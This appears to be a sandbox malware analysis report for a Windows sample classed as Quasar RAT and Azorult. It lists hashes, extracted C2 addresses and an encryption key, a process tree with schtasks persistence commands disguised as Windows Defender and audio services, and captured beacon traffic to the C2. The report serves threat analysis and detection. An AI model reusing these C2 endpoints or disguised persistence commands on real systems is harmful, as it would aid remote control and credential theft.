Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    4s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    08/09/2024, 05:22 UTC

General

  • Target

    6b031e410e70989b3df201283d8f8d30N.exe

  • Size

    2.0MB

  • MD5

    6b031e410e70989b3df201283d8f8d30

  • SHA1

    6281cab2aecbfc9367aa3b79fd3047b66aa54d2e

  • SHA256

    6b3861de672779b6bb38b1854c22bc4cfaa86c50ba96125e5f2e9e9aa5fb9e22

  • SHA512

    55aaf43a235fbce6e80f0180c4c8423646e40bb45a2b50db3a596c1d2c230cc4e050a91f6186acb6c55d1a83166edd23a8d3dcfb62bd6e448d41097330a1b70f

  • SSDEEP

    24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKY9:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9Yv

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

EbayProfiles

C2

5.8.88.191:443

sockartek.icu:443

Mutex

QSR_MUTEX_0kBRNrRz5TDLEQouI0

Attributes
  • encryption_key

    MWhG6wsClMX8aJM2CVXT

  • install_name

    winsock.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    win defender run

  • subdirectory

    SubDir

Extracted

Family

azorult

C2

http://0x21.in:8000/_az/

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 8 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6b031e410e70989b3df201283d8f8d30N.exe
    "C:\Users\Admin\AppData\Local\Temp\6b031e410e70989b3df201283d8f8d30N.exe"
    1⤵
    • Loads dropped DLL
    • Enumerates connected drives
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2732
    • C:\Users\Admin\AppData\Local\Temp\vnc.exe
      "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:2644
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k
        3⤵
        • Maps connected drives based on registry
        PID:1712
    • C:\Users\Admin\AppData\Local\Temp\windef.exe
      "C:\Users\Admin\AppData\Local\Temp\windef.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2652
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2212
      • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
        "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
        3⤵
          PID:2552
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1452
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\re1bmGQnyzJJ.bat" "
            4⤵
              PID:2776
              • C:\Windows\SysWOW64\chcp.com
                chcp 65001
                5⤵
                  PID:1684
                • C:\Windows\SysWOW64\PING.EXE
                  ping -n 10 localhost
                  5⤵
                  • System Network Configuration Discovery: Internet Connection Discovery
                  • Runs ping.exe
                  PID:968
                • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
                  "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
                  5⤵
                    PID:1580
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2552 -s 1464
                  4⤵
                  • Program crash
                  PID:688
            • C:\Users\Admin\AppData\Local\Temp\6b031e410e70989b3df201283d8f8d30N.exe
              "C:\Users\Admin\AppData\Local\Temp\6b031e410e70989b3df201283d8f8d30N.exe"
              2⤵
              • System Location Discovery: System Language Discovery
              PID:2856
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
              2⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:2960
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {64967B83-76DA-48E6-9134-EB3751289BCD} S-1-5-21-457978338-2990298471-2379561640-1000:WOUOSVRD\Admin:Interactive:[1]
            1⤵
              PID:1140
              • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
                C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
                2⤵
                  PID:2916
                  • C:\Users\Admin\AppData\Local\Temp\vnc.exe
                    "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
                    3⤵
                      PID:1476
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k
                        4⤵
                          PID:1800
                      • C:\Users\Admin\AppData\Local\Temp\windef.exe
                        "C:\Users\Admin\AppData\Local\Temp\windef.exe"
                        3⤵
                          PID:1776
                        • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
                          "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe"
                          3⤵
                            PID:2264
                          • C:\Windows\SysWOW64\schtasks.exe
                            "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
                            3⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:568

                      Network

                      • flag-us
                        DNS
                        0x21.in
                        6b031e410e70989b3df201283d8f8d30N.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        0x21.in
                        IN A
                        Response
                        0x21.in
                        IN A
                        44.221.84.105
                      • flag-us
                        DNS
                        0x21.in
                        6b031e410e70989b3df201283d8f8d30N.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        0x21.in
                        IN A
                      • flag-us
                        DNS
                        0x21.in
                        6b031e410e70989b3df201283d8f8d30N.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        0x21.in
                        IN A
                      • flag-us
                        DNS
                        0x21.in
                        6b031e410e70989b3df201283d8f8d30N.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        0x21.in
                        IN A
                      • flag-us
                        DNS
                        ip-api.com
                        Remote address:
                        8.8.8.8:53
                        Request
                        ip-api.com
                        IN A
                        Response
                        ip-api.com
                        IN A
                        208.95.112.1
                      • flag-us
                        GET
                        http://ip-api.com/json/
                        Remote address:
                        208.95.112.1:80
                        Request
                        GET /json/ HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                        Host: ip-api.com
                        Connection: Keep-Alive
                        Response
                        HTTP/1.1 200 OK
                        Date: Sun, 08 Sep 2024 05:22:21 GMT
                        Content-Type: application/json; charset=utf-8
                        Content-Length: 311
                        Access-Control-Allow-Origin: *
                        X-Ttl: 60
                        X-Rl: 44
                      • flag-us
                        POST
                        http://0x21.in:8000/_az/
                        Remote address:
                        44.221.84.105:8000
                        Request
                        POST /_az/ HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                        Host: 0x21.in:8000
                        Content-Length: 107
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx
                        Date: Sun, 08 Sep 2024 05:22:20 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                        Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                        Set-Cookie: btst=ade1da7ba7d13b39eb8535387d9309a7|194.110.13.70|1725772940|1725772940|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                        Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                      • flag-us
                        DNS
                        0x21.in
                        6b031e410e70989b3df201283d8f8d30N.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        0x21.in
                        IN A
                        Response
                        0x21.in
                        IN A
                        44.221.84.105
                      • flag-us
                        POST
                        http://0x21.in/_az/
                        Remote address:
                        44.221.84.105:8000
                        Request
                        POST /_az/ HTTP/1.0
                        Host: 0x21.in
                        Connection: close
                        User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                        Content-Length: 107
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx
                        Date: Sun, 08 Sep 2024 05:22:21 GMT
                        Content-Type: text/html
                        Connection: close
                        Set-Cookie: btst=6074530b715a1a97da7241528ef55708|194.110.13.70|1725772941|1725772941|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                        Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                      • flag-us
                        GET
                        http://ip-api.com/json/
                        Remote address:
                        208.95.112.1:80
                        Request
                        GET /json/ HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                        Host: ip-api.com
                        Connection: Keep-Alive
                        Response
                        HTTP/1.1 200 OK
                        Date: Sun, 08 Sep 2024 05:22:33 GMT
                        Content-Type: application/json; charset=utf-8
                        Content-Length: 311
                        Access-Control-Allow-Origin: *
                        X-Ttl: 48
                        X-Rl: 43
                      • flag-us
                        DNS
                        sockartek.icu
                        Remote address:
                        8.8.8.8:53
                        Request
                        sockartek.icu
                        IN A
                        Response
                      • flag-us
                        DNS
                        0x21.in
                        6b031e410e70989b3df201283d8f8d30N.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        0x21.in
                        IN A
                        Response
                        0x21.in
                        IN A
                        44.221.84.105
                      • flag-us
                        POST
                        http://0x21.in:8000/_az/
                        Remote address:
                        44.221.84.105:8000
                        Request
                        POST /_az/ HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                        Host: 0x21.in:8000
                        Content-Length: 107
                        Cache-Control: no-cache
                        Cookie: btst=ade1da7ba7d13b39eb8535387d9309a7|194.110.13.70|1725772940|1725772940|0|1|0; snkz=194.110.13.70
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx
                        Date: Sun, 08 Sep 2024 05:23:23 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                        Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                        Set-Cookie: btst=ade1da7ba7d13b39eb8535387d9309a7|194.110.13.70|1725773003|1725772940|31|2|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                      • flag-us
                        DNS
                        0x21.in
                        6b031e410e70989b3df201283d8f8d30N.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        0x21.in
                        IN A
                        Response
                        0x21.in
                        IN A
                        44.221.84.105
                      • flag-us
                        DNS
                        0x21.in
                        6b031e410e70989b3df201283d8f8d30N.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        0x21.in
                        IN A
                      • flag-us
                        POST
                        http://0x21.in/_az/
                        Remote address:
                        44.221.84.105:8000
                        Request
                        POST /_az/ HTTP/1.0
                        Host: 0x21.in
                        Connection: close
                        User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                        Content-Length: 107
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx
                        Date: Sun, 08 Sep 2024 05:23:27 GMT
                        Content-Type: text/html
                        Connection: close
                        Set-Cookie: btst=2292581995db3c7c8461aee6f7f6bbc1|194.110.13.70|1725773007|1725773007|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                        Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                      • 5.8.88.191:8080
                        svchost.exe
                        152 B
                        3
                      • 208.95.112.1:80
                        http://ip-api.com/json/
                        http
                        426 B
                        580 B
                        6
                        2

                        HTTP Request

                        GET http://ip-api.com/json/

                        HTTP Response

                        200
                      • 44.221.84.105:8000
                        http://0x21.in:8000/_az/
                        http
                        583 B
                        908 B
                        7
                        6

                        HTTP Request

                        POST http://0x21.in:8000/_az/

                        HTTP Response

                        200
                      • 44.221.84.105:8000
                        http://0x21.in/_az/
                        http
                        770 B
                        560 B
                        6
                        4

                        HTTP Request

                        POST http://0x21.in/_az/

                        HTTP Response

                        200
                      • 208.95.112.1:80
                        http://ip-api.com/json/
                        http
                        472 B
                        1.1kB
                        7
                        4

                        HTTP Request

                        GET http://ip-api.com/json/

                        HTTP Response

                        200
                      • 5.8.88.191:443
                        152 B
                        3
                      • 5.8.88.191:8080
                        152 B
                        3
                      • 5.8.88.191:8080
                        152 B
                        3
                      • 44.221.84.105:8000
                        http://0x21.in:8000/_az/
                        http
                        652 B
                        790 B
                        6
                        5

                        HTTP Request

                        POST http://0x21.in:8000/_az/

                        HTTP Response

                        200
                      • 44.221.84.105:8000
                        http://0x21.in/_az/
                        http
                        480 B
                        588 B
                        5
                        5

                        HTTP Request

                        POST http://0x21.in/_az/

                        HTTP Response

                        200
                      • 5.8.88.191:8080
                        152 B
                        3
                      • 5.8.88.191:8080
                        152 B
                        3
                      • 8.8.8.8:53
                        0x21.in
                        dns
                        6b031e410e70989b3df201283d8f8d30N.exe
                        212 B
                        69 B
                        4
                        1

                        DNS Request

                        0x21.in

                        DNS Request

                        0x21.in

                        DNS Request

                        0x21.in

                        DNS Request

                        0x21.in

                        DNS Response

                        44.221.84.105

                      • 8.8.8.8:53
                        ip-api.com
                        dns
                        56 B
                        72 B
                        1
                        1

                        DNS Request

                        ip-api.com

                        DNS Response

                        208.95.112.1

                      • 8.8.8.8:53
                        0x21.in
                        dns
                        6b031e410e70989b3df201283d8f8d30N.exe
                        53 B
                        69 B
                        1
                        1

                        DNS Request

                        0x21.in

                        DNS Response

                        44.221.84.105

                      • 8.8.8.8:53
                        sockartek.icu
                        dns
                        59 B
                        124 B
                        1
                        1

                        DNS Request

                        sockartek.icu

                      • 8.8.8.8:53
                        0x21.in
                        dns
                        6b031e410e70989b3df201283d8f8d30N.exe
                        53 B
                        69 B
                        1
                        1

                        DNS Request

                        0x21.in

                        DNS Response

                        44.221.84.105

                      • 8.8.8.8:53
                        0x21.in
                        dns
                        6b031e410e70989b3df201283d8f8d30N.exe
                        106 B
                        69 B
                        2
                        1

                        DNS Request

                        0x21.in

                        DNS Request

                        0x21.in

                        DNS Response

                        44.221.84.105

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Temp\re1bmGQnyzJJ.bat

                        Filesize

                        208B

                        MD5

                        7efacaeea145048f9b0295f190d025ed

                        SHA1

                        3aaa211209085a8b2d82dfc8b4f5c7c1a9dd6218

                        SHA256

                        5749c54879434b8d9716937102bdd2f88cb22e46ab4869cc892f2aa801f98cec

                        SHA512

                        177810602be80b98da0ddc627ed6f3429106b775984f96f950df89b3db2f8cc2a889cc3016aee08fdf3c24bbab5dbe6a3ec24beb1a19002f1125a0de6c1e24aa

                      • C:\Users\Admin\AppData\Local\Temp\windef.exe

                        Filesize

                        349KB

                        MD5

                        b4a202e03d4135484d0e730173abcc72

                        SHA1

                        01b30014545ea526c15a60931d676f9392ea0c70

                        SHA256

                        7050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9

                        SHA512

                        632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\09RVX49Z.txt

                        Filesize

                        209B

                        MD5

                        5a4ed0f751fa0cb70c32f65e8d729973

                        SHA1

                        8d73f86c2abe14ea3eb83e6787d037f333e18965

                        SHA256

                        87ad42b85d171471a1cbae263ca34f966f4a6ce340bc076238f5f974a87e8f23

                        SHA512

                        8e0ab66c6ea80540309b93cce589e4ec1ffd7ba54976ee7d45270848fd5240958dbfe617d2b534b2dacc9ce041dbd6aaee0c278d5de6ba3bfe40290c6e484d7f

                      • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe

                        Filesize

                        2.0MB

                        MD5

                        30c8f58a03330d1d59b53005bc3266aa

                        SHA1

                        f73909f889b6eda434897e02a551f3a3a7257d7f

                        SHA256

                        52148d687b1bd4cab5195b37cbdcad8ee44db560c2a1640b8203caad95a7537b

                        SHA512

                        9f91d3b0d1fdf1e30a5b3ea248f5f1bb38a61d3e832ad7b4e958deb834e71ecd5544ea26074cff6243e939a54912042798eab362279566be914784c146d0d628

                      • \Users\Admin\AppData\Local\Temp\vnc.exe

                        Filesize

                        405KB

                        MD5

                        b8ba87ee4c3fc085a2fed0d839aadce1

                        SHA1

                        b3a2e3256406330e8b1779199bb2b9865122d766

                        SHA256

                        4e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4

                        SHA512

                        7a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2

                      • memory/1712-47-0x0000000000020000-0x0000000000021000-memory.dmp

                        Filesize

                        4KB

                      • memory/1712-48-0x00000000001D0000-0x000000000026C000-memory.dmp

                        Filesize

                        624KB

                      • memory/1712-53-0x00000000001D0000-0x000000000026C000-memory.dmp

                        Filesize

                        624KB

                      • memory/1712-52-0x00000000001D0000-0x000000000026C000-memory.dmp

                        Filesize

                        624KB

                      • memory/1712-67-0x00000000001D0000-0x000000000026C000-memory.dmp

                        Filesize

                        624KB

                      • memory/1712-46-0x000007FFFFFDD000-0x000007FFFFFDE000-memory.dmp

                        Filesize

                        4KB

                      • memory/1712-44-0x0000000000020000-0x0000000000021000-memory.dmp

                        Filesize

                        4KB

                      • memory/1776-119-0x0000000000B50000-0x0000000000BAE000-memory.dmp

                        Filesize

                        376KB

                      • memory/1800-118-0x000007FFFFFD8000-0x000007FFFFFD9000-memory.dmp

                        Filesize

                        4KB

                      • memory/1800-120-0x00000000003E0000-0x000000000047C000-memory.dmp

                        Filesize

                        624KB

                      • memory/2264-126-0x00000000000D0000-0x00000000000F0000-memory.dmp

                        Filesize

                        128KB

                      • memory/2264-129-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                        Filesize

                        4KB

                      • memory/2264-133-0x00000000000D0000-0x00000000000F0000-memory.dmp

                        Filesize

                        128KB

                      • memory/2552-66-0x0000000000DA0000-0x0000000000DFE000-memory.dmp

                        Filesize

                        376KB

                      • memory/2652-56-0x0000000000310000-0x000000000036E000-memory.dmp

                        Filesize

                        376KB

                      • memory/2732-30-0x0000000001060000-0x0000000001061000-memory.dmp

                        Filesize

                        4KB

                      • memory/2856-43-0x0000000000080000-0x00000000000A0000-memory.dmp

                        Filesize

                        128KB

                      • memory/2856-39-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                        Filesize

                        4KB

                      • memory/2856-31-0x0000000000080000-0x00000000000A0000-memory.dmp

                        Filesize

                        128KB

                      • memory/2856-33-0x0000000000080000-0x00000000000A0000-memory.dmp

                        Filesize

                        128KB

                      We care about your privacy.

                      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.